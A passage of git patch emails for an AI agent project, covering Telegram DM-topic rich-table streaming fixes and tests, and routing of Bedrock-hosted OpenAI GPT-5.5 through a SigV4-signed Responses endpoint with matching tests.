TelegramAdapter(BasePlatformAdapter): text = content if len(content) <= self.MAX_MESSAGE_LENGTH else \ self.truncate_message(content, self.MAX_MESSAGE_LENGTH, len_fn=utf16_len)[0] - thread_id = self._metadata_thread_id(metadata) - # Apply the same MarkdownV2 conversion the regular ``send`` path uses # so the animated draft preview renders with identical formatting to # the final message. Without this, the draft streams as raw text and @@ -6056,6 +6086,7 @@ class TelegramAdapter(BasePlatformAdapter): and self._needs_rich_rendering(text) ) draft_modes = (False,) if plain_rich_preview else (True, False) + draft_thread_kwargs = self._thread_kwargs_for_draft(chat_id, metadata) for use_markdown in draft_modes: kwargs: Dict[str, Any] = { "chat_id": normalize_telegram_chat_id(chat_id), @@ -6064,8 +6095,7 @@ class TelegramAdapter(BasePlatformAdapter): } if use_markdown: kwargs["parse_mode"] = ParseMode.MARKDOWN_V2 - if thread_id is not None: - kwargs["message_thread_id"] = thread_id + kwargs.update(draft_thread_kwargs) try: ok = await self._bot.send_message_draft(**kwargs) From a5ca9c06e62193a971fbad86549b63014f122f9b Mon Sep 17 00:00:00 2001 From: HexLab98 Date: Fri, 21 Aug 2026 17:15:01 +0700 Subject: [PATCH 057/161] test(telegram): cover DM-topic table streaming after draft degradation MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Pins integer topic routing on send_draft, a successful topic stream that finalizes through sendRichMessage, and the reporter path where sendMessageDraft and in-place rich edits both fail — the persistent payload must still be the raw pipe table, not convert_table_to_bullets. --- tests/gateway/test_telegram_rich_messages.py | 144 ++++++++++++++++++- 1 file changed, 141 insertions(+), 3 deletions(-) diff --git a/tests/gateway/test_telegram_rich_messages.py b/tests/gateway/test_telegram_rich_messages.py index 55a2c32923..2023eacbf3 100644 --- a/tests/gateway/test_telegram_rich_messages.py +++ b/tests/gateway/test_telegram_rich_messages.py @@ -377,13 +377,29 @@ async def test_cjk_rich_content_skips_rich_draft_to_avoid_tdesktop_garble(): # ---------------------------------------------------------------------- -# prefers_fresh_final_streaming: Telegram keeps streamed finals on the edit -# path, even when rich messages are enabled, so users do not briefly see two -# copies of the answer while the preview cleanup delete races the fresh send. +# prefers_fresh_final_streaming: root DMs stay on the no-duplicate edit/draft +# path (#47048). DM topics that degrade off drafts still need a fresh +# sendRichMessage so tables are not flattened by format_message. # ---------------------------------------------------------------------- def test_prefers_fresh_final_streaming_stays_disabled_when_rich_enabled(): adapter = _make_adapter() assert adapter.prefers_fresh_final_streaming(RICH_CONTENT) is False + assert adapter.prefers_fresh_final_streaming(RICH_CONTENT, None) is False + + +def test_prefers_fresh_final_streaming_for_dm_topic_tables(): + adapter = _make_adapter() + topic_meta = { + "thread_id": "20189", + "telegram_dm_topic_reply_fallback": True, + "direct_messages_topic_id": "20189", + "telegram_reply_to_message_id": "42", + } + assert adapter.prefers_fresh_final_streaming(RICH_CONTENT, topic_meta) is True + assert adapter.prefers_fresh_final_streaming("Just a sentence.", topic_meta) is False + assert adapter.prefers_fresh_final_streaming( + RICH_CONTENT, {"direct_messages_topic_id": "20189"} + ) is True @pytest.mark.asyncio @@ -470,6 +486,128 @@ async def test_dm_table_stream_persists_through_send_rich_message(): adapter._bot.send_message.assert_not_called() +TOPIC_METADATA = { + "thread_id": "20189", + "telegram_dm_topic_reply_fallback": True, + "direct_messages_topic_id": "20189", + "telegram_reply_to_message_id": "42", +} + +# Shape from the Telegram iOS DM-topic report: blank line, then a GFM table. +TOPIC_TABLE = ( + "Here's a table:\n" + "\n" + "| Sport | Followed? | Notes |\n" + "|---|---|---|\n" + "| F1 | ✅ | |\n" + "| MLB | ✅ | |\n" + "| LoL | ✅ | |\n" +) + + +@pytest.mark.asyncio +async def test_send_draft_routes_dm_topic_thread_id_as_int(): + """Drafts must use the same integer thread routing as send(), not the + raw string thread_id. Telegram rejects the string on private topics.""" + adapter = _make_adapter() + + result = await adapter.send_draft( + "12345", draft_id=7, content=TOPIC_TABLE, metadata=TOPIC_METADATA, + ) + + assert result.success is True + kwargs = adapter._bot.send_message_draft.call_args.kwargs + assert kwargs["message_thread_id"] == 20189 + assert kwargs["text"] == TOPIC_TABLE + assert "parse_mode" not in kwargs + + +@pytest.mark.asyncio +async def test_dm_topic_table_stream_uses_send_rich_message(): + """Happy-path topic stream: drafts land, persistent final is rich.""" + adapter = _make_adapter() + consumer = GatewayStreamConsumer( + adapter, + "12345", + StreamConsumerConfig( + transport="auto", + chat_type="dm", + edit_interval=0.01, + buffer_threshold=1, + cursor="", + ), + metadata=dict(TOPIC_METADATA), + initial_reply_to_id="42", + ) + + task = asyncio.create_task(consumer.run()) + consumer.on_delta(TOPIC_TABLE) + await asyncio.sleep(0.05) + consumer.finish() + await task + + adapter._bot.send_message_draft.assert_awaited() + draft_kwargs = adapter._bot.send_message_draft.call_args.kwargs + assert draft_kwargs["text"] == TOPIC_TABLE + assert draft_kwargs["message_thread_id"] == 20189 + rich_endpoints = [call.args[0] for call in adapter._bot.do_api_request.await_args_list] + assert rich_endpoints == ["sendRichMessage"] + adapter._bot.send_message.assert_not_called() + + +@pytest.mark.asyncio +async def test_dm_topic_table_survives_when_drafts_degrade_to_edit(): + """Reporter path: sendMessageDraft fails in a private topic, Telegram + then rejects a rich edit of the plain MarkdownV2 preview. The final + must still persist through sendRichMessage — not convert_table_to_bullets. + """ + adapter = _make_adapter() + adapter._bot.send_message_draft = AsyncMock( + side_effect=BadRequest("Bad Request: message thread not found") + ) + + async def _api(endpoint, api_kwargs=None, **kwargs): + if endpoint == "editMessageText" and api_kwargs and "rich_message" in api_kwargs: + raise BadRequest("can't parse rich message") + if endpoint == "sendRichMessage": + return SimpleNamespace(message_id=123) + return SimpleNamespace(message_id=1) + + adapter._bot.do_api_request = AsyncMock(side_effect=_api) + + consumer = GatewayStreamConsumer( + adapter, + "12345", + StreamConsumerConfig( + transport="auto", + chat_type="dm", + edit_interval=0.01, + buffer_threshold=1, + cursor="", + ), + metadata=dict(TOPIC_METADATA), + initial_reply_to_id="42", + ) + + task = asyncio.create_task(consumer.run()) + consumer.on_delta(TOPIC_TABLE) + await asyncio.sleep(0.08) + consumer.finish() + await task + + rich_endpoints = [call.args[0] for call in adapter._bot.do_api_request.await_args_list] + assert "sendRichMessage" in rich_endpoints + rich_kwargs = None + for call in adapter._bot.do_api_request.await_args_list: + if call.args[0] == "sendRichMessage": + rich_kwargs = call.kwargs["api_kwargs"] + break + assert rich_kwargs is not None + assert "| F1 |" in rich_kwargs["rich_message"]["markdown"] + # Degraded preview is deleted so the user is not left with the bullet rewrite. + adapter._bot.delete_message.assert_awaited() + + def test_supports_draft_streaming_enabled_when_rich_drafts_opt_in(): adapter = _make_adapter(extra={"rich_drafts": True}) assert adapter.supports_draft_streaming(chat_type="dm") is True From bad2ed866c16357800e569a0b194392b165bd2b2 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:23:00 +0530 Subject: [PATCH 058/161] fix(telegram): honor the direct-messages-topic alias in the fresh-final gate prefers_fresh_final_streaming read only the raw direct_messages_topic_id key; the adapter's canonical accessor _metadata_direct_messages_topic_id also accepts the documented telegram_direct_messages_topic_id alias (treated as equivalent in gateway/delivery.py), so an alias-only lane would still flatten tables. Route the gate through the accessor and pin the alias with a regression (mutation-checked: raw-key gate fails it). Also reshape the happy-path endpoint assertion into the actual invariant (sendRichMessage present, no rich draft frames) instead of a frozen call list. Surfaced during review of PR #91436. --- plugins/platforms/telegram/adapter.py | 2 +- tests/gateway/test_telegram_rich_messages.py | 11 ++++++++++- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index 6bd42ea17b..1642ee039e 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -2107,7 +2107,7 @@ class TelegramAdapter(BasePlatformAdapter): metadata = metadata or {} if not ( metadata.get("telegram_dm_topic_reply_fallback") - or metadata.get("direct_messages_topic_id") + or self._metadata_direct_messages_topic_id(metadata) ): return False return self._rich_eligible(content) diff --git a/tests/gateway/test_telegram_rich_messages.py b/tests/gateway/test_telegram_rich_messages.py index 2023eacbf3..1e895eee69 100644 --- a/tests/gateway/test_telegram_rich_messages.py +++ b/tests/gateway/test_telegram_rich_messages.py @@ -400,6 +400,12 @@ def test_prefers_fresh_final_streaming_for_dm_topic_tables(): assert adapter.prefers_fresh_final_streaming( RICH_CONTENT, {"direct_messages_topic_id": "20189"} ) is True + # The documented telegram_-prefixed alias is honored through the same + # canonical accessor the send path uses (gateway/delivery.py treats the + # two keys as equivalent) — an alias-only lane must not flatten tables. + assert adapter.prefers_fresh_final_streaming( + RICH_CONTENT, {"telegram_direct_messages_topic_id": "20189"} + ) is True @pytest.mark.asyncio @@ -551,7 +557,10 @@ async def test_dm_topic_table_stream_uses_send_rich_message(): assert draft_kwargs["text"] == TOPIC_TABLE assert draft_kwargs["message_thread_id"] == 20189 rich_endpoints = [call.args[0] for call in adapter._bot.do_api_request.await_args_list] - assert rich_endpoints == ["sendRichMessage"] + # Invariant, not a frozen call list: the persistent final goes through + # sendRichMessage, and no rich DRAFT frames fire (rich_drafts is off). + assert "sendRichMessage" in rich_endpoints + assert "sendRichMessageDraft" not in rich_endpoints adapter._bot.send_message.assert_not_called() From e5b96fcb10077f0b6ffaa06de6516dfcc510d992 Mon Sep 17 00:00:00 2001 From: Nathaniel Branscum Date: Sat, 27 Jun 2026 17:35:56 -0700 Subject: [PATCH 059/161] feat(bedrock): support OpenAI Responses models Route Bedrock-hosted OpenAI GPT-5.5 through the Bedrock Mantle OpenAI Responses endpoint with SigV4 request signing. Keep native Bedrock Converse and Claude Bedrock routing unchanged, and add picker/runtime regression coverage. --- agent/agent_init.py | 14 ++ agent/auxiliary_client.py | 41 ++++- agent/bedrock_adapter.py | 154 +++++++++++++++++- hermes_cli/models.py | 1 + hermes_cli/runtime_provider.py | 29 +++- tests/agent/test_bedrock_integration.py | 54 ++++++ tests/hermes_cli/test_bedrock_model_picker.py | 14 +- 7 files changed, 291 insertions(+), 16 deletions(-) diff --git a/agent/agent_init.py b/agent/agent_init.py index db92f18487..88b4d1caf7 100644 --- a/agent/agent_init.py +++ b/agent/agent_init.py @@ -1259,6 +1259,7 @@ def init_agent( _gr_label = " + Guardrails" if agent._bedrock_guardrail_config else "" print(f"🤖 AI Agent initialized with model: {agent.model} (AWS Bedrock, {agent._bedrock_region}{_gr_label})") else: + client_kwargs = {} if api_key and base_url: # Explicit credentials from CLI/gateway — construct directly. # The runtime provider resolver already handled auth for us. @@ -1430,6 +1431,19 @@ def init_agent( "select a provider, or run `hermes setup` for first-time " "configuration." ) + # Bedrock GPT-5.5 uses Bedrock Mantle's OpenAI Responses endpoint. + # Runtime resolution uses api_key="aws-sdk" as the IAM-auth sentinel; + # attach an httpx client that SigV4-signs every OpenAI SDK request. + if "client_kwargs" in locals(): + try: + from agent.bedrock_adapter import configure_bedrock_openai_client_kwargs + configure_bedrock_openai_client_kwargs( + client_kwargs, + timeout=_provider_timeout, + ) + except Exception: + if agent.provider == "bedrock" and "bedrock-mantle." in str(client_kwargs.get("base_url", "")): + raise agent._client_kwargs = client_kwargs # stored for rebuilding after interrupt diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py index 551341e9a6..c436673268 100644 --- a/agent/auxiliary_client.py +++ b/agent/auxiliary_client.py @@ -6983,8 +6983,12 @@ def resolve_provider_client( default_model = "google/gemini-3-flash-preview" final_model = _normalize_resolved_model(model or default_model, provider) try: - from openai import OpenAI - client = OpenAI(api_key=token, base_url=base_url) + # Alias the import: a bare `from openai import OpenAI` here would + # make `OpenAI` function-local and shadow the module-level lazy + # proxy for every other branch of this function (breaking both the + # Bedrock Mantle branch below and patch("agent.auxiliary_client.OpenAI")). + from openai import OpenAI as _VertexOpenAI + client = _VertexOpenAI(api_key=token, base_url=base_url) except Exception as exc: logger.warning("resolve_provider_client: cannot create Vertex " "client: %s", exc) @@ -6995,17 +6999,23 @@ def resolve_provider_client( elif pconfig.auth_type == "aws_sdk": # AWS SDK providers (Bedrock) — Claude models use the Anthropic Bedrock - # SDK (prompt caching, thinking); non-Claude models use Converse API. + # SDK (prompt caching, thinking); OpenAI models (GPT-5.5/5.6) use + # Bedrock Mantle's OpenAI Responses endpoint; all other models use the + # Converse API. try: from agent.bedrock_adapter import ( has_aws_credentials, is_anthropic_bedrock_model, resolve_bedrock_region, + is_openai_bedrock_model, + bedrock_openai_base_url, + resolve_bedrock_bearer_token, + configure_bedrock_openai_client_kwargs, ) from agent.anthropic_adapter import build_anthropic_bedrock_client except ImportError: logger.warning("resolve_provider_client: bedrock requested but " - "boto3 or anthropic SDK not installed") + "boto3, httpx/openai, or anthropic SDK not installed") return None, None if not has_aws_credentials(): @@ -7015,7 +7025,28 @@ def resolve_provider_client( region = resolve_bedrock_region() default_model = "anthropic.claude-haiku-4-5-20251001-v1:0" - final_model = _normalize_resolved_model(model or default_model, provider) + final_model = _normalize_resolved_model(model or default_model, provider) or default_model + + if is_openai_bedrock_model(final_model): + # NOTE: no local `from openai import OpenAI` here — the module-level + # lazy proxy (see top of file) must stay visible so tests can + # patch("agent.auxiliary_client.OpenAI", ...). + bearer = resolve_bedrock_bearer_token() + mantle_base_url = bedrock_openai_base_url(region) + client_kwargs: Dict[str, Any] = { + "api_key": bearer or "aws-sdk", + "base_url": mantle_base_url, + } + configure_bedrock_openai_client_kwargs(client_kwargs) + client = OpenAI(**client_kwargs) + logger.debug("resolve_provider_client: bedrock-openai (%s, %s)", final_model, region) + if raw_codex: + return (_to_async_client(client, final_model, is_vision=is_vision) if async_mode + else (client, final_model)) + wrapped = CodexAuxiliaryClient(client, final_model) + return (_to_async_client(wrapped, final_model, is_vision=is_vision) if async_mode + else (wrapped, final_model)) + base_url = f"https://bedrock-runtime.{region}.amazonaws.com" if is_anthropic_bedrock_model(final_model): diff --git a/agent/bedrock_adapter.py b/agent/bedrock_adapter.py index 8d63323fd2..c930bc2a73 100644 --- a/agent/bedrock_adapter.py +++ b/agent/bedrock_adapter.py @@ -33,6 +33,9 @@ import os import re from types import SimpleNamespace from typing import Any, Dict, List, Optional, Tuple +from urllib.parse import urlparse + +import httpx logger = logging.getLogger(__name__) @@ -57,6 +60,18 @@ except Exception: _bedrock_runtime_client_cache: Dict[str, Any] = {} _bedrock_control_client_cache: Dict[str, Any] = {} +# Bedrock-hosted OpenAI GPT-5.5 is not exposed through the native Converse +# runtime. AWS serves it from the Bedrock Mantle OpenAI-compatible Responses +# endpoint instead (https://bedrock-mantle..api.aws/openai/v1). +# Keep the allowlist intentionally narrow so OpenAI GPT-OSS models that are +# Converse-capable continue to use the native Bedrock path. +BEDROCK_OPENAI_RESPONSES_MODEL_IDS: Tuple[str, ...] = ( + "openai.gpt-5.5", +) +_BEDROCK_OPENAI_HOST_RE = re.compile( + r"^bedrock-mantle\.([a-z0-9-]+)\.api\.aws$", re.IGNORECASE +) + _MIN_BOTO3_VERSION = (1, 34, 59) @@ -133,6 +148,143 @@ def invalidate_runtime_client(region: str) -> bool: return existed +# --------------------------------------------------------------------------- +# Bedrock Mantle / OpenAI Responses support +# --------------------------------------------------------------------------- + + +def is_openai_bedrock_model(model_id: str) -> bool: + """Return True for Bedrock-hosted OpenAI models that require Mantle. + + Bedrock's GPT-OSS models are Converse-capable and intentionally do not + match this helper. The allowlist tracks models served by the OpenAI + Responses-compatible ``bedrock-mantle`` route. + """ + normalized = str(model_id or "").strip().lower() + return normalized in {m.lower() for m in BEDROCK_OPENAI_RESPONSES_MODEL_IDS} + + +def merge_bedrock_openai_model_ids(model_ids: List[str]) -> List[str]: + """Append Bedrock OpenAI Responses models to a discovered Bedrock list. + + The Bedrock control plane's ListFoundationModels/ListInferenceProfiles + discovery covers Converse models but does not enumerate Mantle-only + OpenAI Responses models. The picker needs both surfaces under AWS Bedrock. + """ + merged = list(model_ids or []) + seen = {str(m).lower() for m in merged} + for model_id in BEDROCK_OPENAI_RESPONSES_MODEL_IDS: + if model_id.lower() not in seen: + merged.append(model_id) + seen.add(model_id.lower()) + return merged + + +def bedrock_openai_base_url(region: str) -> str: + """Return Bedrock Mantle's OpenAI-compatible base URL for *region*.""" + resolved = (region or "").strip() or resolve_bedrock_region() + return f"https://bedrock-mantle.{resolved}.api.aws/openai/v1" + + +def bedrock_openai_region_from_base_url(base_url: str) -> Optional[str]: + """Extract the AWS region from a Bedrock Mantle OpenAI base URL.""" + host = urlparse(str(base_url or "")).hostname or "" + match = _BEDROCK_OPENAI_HOST_RE.match(host) + return match.group(1) if match else None + + +def is_bedrock_openai_base_url(base_url: str) -> bool: + """Return True for Bedrock Mantle OpenAI-compatible endpoints.""" + parsed = urlparse(str(base_url or "")) + host = parsed.hostname or "" + if not _BEDROCK_OPENAI_HOST_RE.match(host): + return False + # The OpenAI GPT-5.5 Bedrock route lives under /openai/v1. Accept a bare + # host too so callers can normalize before appending the path. + path = (parsed.path or "").rstrip("/").lower() + return path in {"", "/openai", "/openai/v1"} + + +def resolve_bedrock_bearer_token(env: Optional[Dict[str, str]] = None) -> str: + """Return AWS_BEARER_TOKEN_BEDROCK when Bedrock API-key auth is configured.""" + env = env if env is not None else os.environ + return (env.get("AWS_BEARER_TOKEN_BEDROCK", "") or "").strip() + + +class BedrockOpenAISigV4Auth(httpx.Auth): + """httpx auth hook that SigV4-signs Bedrock Mantle OpenAI requests.""" + + requires_request_body = True + + def __init__(self, region: str, service: str = "bedrock"): + self.region = (region or "").strip() or resolve_bedrock_region() + self.service = service + + def auth_flow(self, request): # pragma: no cover - exercised by live call + import botocore.session + from botocore.auth import SigV4Auth + from botocore.awsrequest import AWSRequest + + credentials = botocore.session.get_session().get_credentials() + if credentials is None: + raise RuntimeError( + "No AWS credentials available for Bedrock OpenAI Responses. " + "Configure AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, AWS_PROFILE, " + "SSO, or an instance/task role." + ) + frozen = credentials.get_frozen_credentials() + # Drop the OpenAI SDK's placeholder bearer header before signing; SigV4 + # must own Authorization. Keep all other SDK headers so AWS receives + # content-type, accept, request IDs, etc. + headers = { + str(k): str(v) + for k, v in request.headers.items() + if str(k).lower() not in {"authorization", "x-amz-date", "x-amz-security-token"} + } + aws_request = AWSRequest( + method=request.method, + url=str(request.url), + data=request.content or b"", + headers=headers, + ) + SigV4Auth(frozen, self.service, self.region).add_auth(aws_request) + request.headers.update(dict(aws_request.headers.items())) + yield request + + +def build_bedrock_openai_http_client(region: str, *, timeout: Optional[float] = None): + """Build an httpx client that SigV4-signs Bedrock OpenAI requests.""" + import httpx + + kwargs: Dict[str, Any] = {"auth": BedrockOpenAISigV4Auth(region)} + if isinstance(timeout, (int, float)) and not isinstance(timeout, bool) and timeout > 0: + kwargs["timeout"] = timeout + return httpx.Client(**kwargs) + + +def configure_bedrock_openai_client_kwargs( + client_kwargs: Dict[str, Any], + *, + timeout: Optional[float] = None, +) -> Dict[str, Any]: + """Install SigV4 auth on OpenAI SDK kwargs for Bedrock Mantle. + + ``AWS_BEARER_TOKEN_BEDROCK``/explicit Bedrock API keys continue to use the + SDK's normal bearer auth. The special ``aws-sdk`` placeholder means IAM + credential-chain auth, so we attach a per-request SigV4 httpx client. + """ + base_url = str(client_kwargs.get("base_url") or "") + if not is_bedrock_openai_base_url(base_url): + return client_kwargs + api_key = client_kwargs.get("api_key") + if isinstance(api_key, str) and api_key.strip() and api_key not in {"aws-sdk", "no-key-required"}: + return client_kwargs + region = bedrock_openai_region_from_base_url(base_url) or resolve_bedrock_region() + client_kwargs["api_key"] = "aws-sdk" + client_kwargs["http_client"] = build_bedrock_openai_http_client(region, timeout=timeout) + return client_kwargs + + # --------------------------------------------------------------------------- # Stale-connection detection # --------------------------------------------------------------------------- @@ -398,7 +550,7 @@ def bedrock_model_ids_or_none() -> Optional[List[str]]: try: discovered = discover_bedrock_models(resolve_bedrock_region()) if discovered: - return [m["id"] for m in discovered] + return merge_bedrock_openai_model_ids([m["id"] for m in discovered]) except Exception: pass return None diff --git a/hermes_cli/models.py b/hermes_cli/models.py index d8e09781bd..00d8e732ad 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -672,6 +672,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = { "us.anthropic.claude-opus-4-6-v1", "us.anthropic.claude-haiku-4-5-20251001-v1:0", "us.anthropic.claude-sonnet-4-5-20250929-v1:0", + "openai.gpt-5.5", "us.amazon.nova-pro-v1:0", "us.amazon.nova-lite-v1:0", "us.amazon.nova-micro-v1:0", diff --git a/hermes_cli/runtime_provider.py b/hermes_cli/runtime_provider.py index 241afac6ec..d3d54e3ed5 100644 --- a/hermes_cli/runtime_provider.py +++ b/hermes_cli/runtime_provider.py @@ -2237,6 +2237,9 @@ def resolve_runtime_provider( resolve_aws_auth_env_var, resolve_bedrock_region, is_anthropic_bedrock_model, + is_openai_bedrock_model, + bedrock_openai_base_url, + resolve_bedrock_bearer_token, ) # When the user explicitly selected bedrock (not auto-detected), # trust boto3's credential chain — it handles IMDS, ECS task roles, @@ -2269,9 +2272,12 @@ def resolve_runtime_provider( guardrail_config["streamProcessingMode"] = _gr["stream_processing_mode"] if _gr.get("trace"): guardrail_config["trace"] = _gr["trace"] - # Dual-path routing: Claude models use AnthropicBedrock SDK for full - # feature parity (prompt caching, thinking budgets, adaptive thinking). - # Non-Claude models use the Converse API for multi-model support. + # Triple-path routing: + # - OpenAI GPT-5.5 on Bedrock uses Bedrock Mantle's OpenAI Responses + # endpoint (not Converse / bedrock-runtime). + # - Claude models use AnthropicBedrock SDK for prompt caching, + # thinking budgets, and adaptive thinking. + # - Other models use the native Converse API. # # Exception: Bearer Token auth (AWS_BEARER_TOKEN_BEDROCK) is NOT # supported by the AnthropicBedrock SDK (it only does SigV4 signing — @@ -2280,7 +2286,20 @@ def resolve_runtime_provider( # API regardless of model. Ref: #28156. _current_model = str(target_model or model_cfg.get("default") or "").strip() _has_bearer_token = bool(os.environ.get("AWS_BEARER_TOKEN_BEDROCK", "").strip()) - if is_anthropic_bedrock_model(_current_model) and not _has_bearer_token: + if is_openai_bedrock_model(_current_model): + bearer = resolve_bedrock_bearer_token() + runtime = { + "provider": "bedrock", + "api_mode": "codex_responses", + "base_url": bedrock_openai_base_url(region), + "api_key": bearer or "aws-sdk", + "source": "AWS_BEARER_TOKEN_BEDROCK" if bearer else auth_source, + "region": region, + "model": _current_model, + "bedrock_openai": True, + "requested_provider": requested_provider, + } + elif is_anthropic_bedrock_model(_current_model) and not _has_bearer_token: # Claude on Bedrock → AnthropicBedrock SDK → anthropic_messages path runtime = { "provider": "bedrock", @@ -2293,7 +2312,7 @@ def resolve_runtime_provider( "requested_provider": requested_provider, } else: - # Non-Claude (Nova, DeepSeek, Llama, etc.) → Converse API + # Non-Claude/OpenAI (Nova, DeepSeek, Llama, GPT-OSS, etc.) → Converse API runtime = { "provider": "bedrock", "api_mode": "bedrock_converse", diff --git a/tests/agent/test_bedrock_integration.py b/tests/agent/test_bedrock_integration.py index 32cd9056ee..9c50f38726 100644 --- a/tests/agent/test_bedrock_integration.py +++ b/tests/agent/test_bedrock_integration.py @@ -69,6 +69,14 @@ class TestModelCatalog: nova_models = [m for m in models if "amazon.nova" in m] assert len(nova_models) > 0 + def test_bedrock_models_include_openai_gpt55(self): + """Bedrock GPT-5.5 is served by the OpenAI Responses-compatible + Bedrock Mantle endpoint, so it must be surfaced even though it is not + returned by the Converse/ListFoundationModels discovery path.""" + from hermes_cli.models import _PROVIDER_MODELS + models = _PROVIDER_MODELS.get("bedrock", []) + assert "openai.gpt-5.5" in models + class TestResolveProvider: """Verify resolve_provider() handles bedrock correctly.""" @@ -151,6 +159,30 @@ class TestRuntimeProvider: assert result["provider"] == "bedrock" assert result["api_mode"] == "bedrock_converse" + def test_bedrock_openai_gpt55_routes_to_mantle_responses(self, monkeypatch): + """OpenAI GPT-5.5 on Bedrock is not a Converse model: route it to + bedrock-mantle's OpenAI Responses surface with IAM/AWS SDK auth.""" + from hermes_cli.runtime_provider import resolve_runtime_provider + + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + monkeypatch.setenv("AWS_REGION", "us-east-2") + + with patch("hermes_cli.runtime_provider.resolve_provider", return_value="bedrock"), \ + patch("hermes_cli.runtime_provider._get_model_config", return_value={ + "provider": "bedrock", + "default": "openai.gpt-5.5", + }): + result = resolve_runtime_provider(requested="bedrock") + + assert result["provider"] == "bedrock" + assert result["api_mode"] == "codex_responses" + assert result["model"] == "openai.gpt-5.5" + assert result["region"] == "us-east-2" + assert result["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + assert result["api_key"] == "aws-sdk" + assert result["bedrock_openai"] is True + # --------------------------------------------------------------------------- # providers.py integration @@ -473,3 +505,25 @@ class TestAuxiliaryClientBedrockResolution: ) wire_kwargs = boto3_client.converse.call_args.kwargs assert wire_kwargs["inferenceConfig"]["maxTokens"] == 1234 + def test_bedrock_openai_gpt55_aux_uses_responses_client(self, monkeypatch): + """Auxiliary tasks on Bedrock GPT-5.5 should use the same Mantle + Responses path, not the AnthropicBedrock shim.""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + monkeypatch.setenv("AWS_REGION", "us-east-2") + + fake_openai_client = MagicMock() + fake_openai_client.api_key = "aws-sdk" + fake_openai_client.base_url = "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + + with patch("agent.auxiliary_client.OpenAI", return_value=fake_openai_client) as mock_openai, \ + patch("agent.bedrock_adapter.build_bedrock_openai_http_client", return_value=MagicMock()): + from agent.auxiliary_client import resolve_provider_client, CodexAuxiliaryClient + client, model = resolve_provider_client("bedrock", "openai.gpt-5.5") + + assert model == "openai.gpt-5.5" + assert isinstance(client, CodexAuxiliaryClient) + kwargs = mock_openai.call_args.kwargs + assert kwargs["api_key"] == "aws-sdk" + assert kwargs["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + assert "http_client" in kwargs diff --git a/tests/hermes_cli/test_bedrock_model_picker.py b/tests/hermes_cli/test_bedrock_model_picker.py index e997af827a..e514580031 100644 --- a/tests/hermes_cli/test_bedrock_model_picker.py +++ b/tests/hermes_cli/test_bedrock_model_picker.py @@ -73,7 +73,8 @@ class TestProviderModelIdsBedrock: assert "eu.anthropic.claude-sonnet-4-6-20250514-v1:0" in result assert "eu.anthropic.claude-haiku-4-5-20251015-v1:0" in result - assert len(result) == len(_EU_MODELS) + assert "openai.gpt-5.5" in result + assert len(result) == len(_EU_MODELS) + 1 def test_region_determines_model_ids(self, monkeypatch): """Different regions produce different model ID prefixes (eu.* vs us.*).""" @@ -85,8 +86,10 @@ class TestProviderModelIdsBedrock: with patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="us-east-1"): us_result = provider_model_ids("bedrock") - assert all(m.startswith("eu.") for m in eu_result) - assert all(m.startswith("us.") for m in us_result) + assert all(m.startswith("eu.") or m == "openai.gpt-5.5" for m in eu_result) + assert all(m.startswith("us.") or m == "openai.gpt-5.5" for m in us_result) + assert "openai.gpt-5.5" in eu_result + assert "openai.gpt-5.5" in us_result assert eu_result != us_result @@ -168,9 +171,10 @@ class TestBedrockRegionRouting: bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) assert bedrock is not None + assert "openai.gpt-5.5" in bedrock["models"] for model_id in bedrock["models"]: - assert model_id.startswith("eu."), \ - f"Expected eu.* model ID from eu-central-1 profile, got {model_id!r}" + assert model_id.startswith("eu.") or model_id == "openai.gpt-5.5", \ + f"Expected eu.* or Bedrock OpenAI model ID from eu-central-1 profile, got {model_id!r}" def test_env_var_takes_priority_over_botocore_profile(self, monkeypatch): From e57d55fc7a5b852efe7e44c969c0e293897d1beb Mon Sep 17 00:00:00 2001 From: Nathaniel Branscum Date: Sat, 27 Jun 2026 18:29:38 -0700 Subject: [PATCH 060/161] fix(moa): keep Bedrock slots on provider runtime Preserve the Bedrock provider identity for MoA reference and aggregator slots so Bedrock OpenAI Responses models use the aws_sdk/SigV4 runtime instead of being downgraded to a generic custom endpoint. Add regression coverage for Bedrock GPT-5.5 MoA slots. --- tests/run_agent/test_moa_loop_mode.py | 50 +++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) diff --git a/tests/run_agent/test_moa_loop_mode.py b/tests/run_agent/test_moa_loop_mode.py index e7c0f9facb..2d45b68838 100644 --- a/tests/run_agent/test_moa_loop_mode.py +++ b/tests/run_agent/test_moa_loop_mode.py @@ -412,6 +412,56 @@ def test_retry_same_provider_sync_preserves_extra_headers(monkeypatch): assert captured.get("extra_headers") == {"x-initiator": "user"} +def test_moa_bedrock_slot_preserves_provider_identity(monkeypatch): + """Bedrock slots must stay on the aws_sdk provider branch. + + Bedrock OpenAI models (GPT-5.5/5.6) resolve to Bedrock Mantle's OpenAI + Responses endpoint with api_key="aws-sdk" as an IAM sentinel. + _slot_runtime forwards the resolved base_url/api_key unconditionally; the + chokepoint that must NOT collapse bedrock to provider=custom is + _resolve_task_provider_model (via _preserve_provider_with_base_url). If it + collapsed, call_llm would send the "aws-sdk" sentinel as an invalid bearer + token instead of attaching the SigV4 Responses client. + """ + from agent import moa_loop + from agent.auxiliary_client import _resolve_task_provider_model + + def fake_resolve(*, requested, target_model=None): + return { + "provider": requested, + "api_mode": 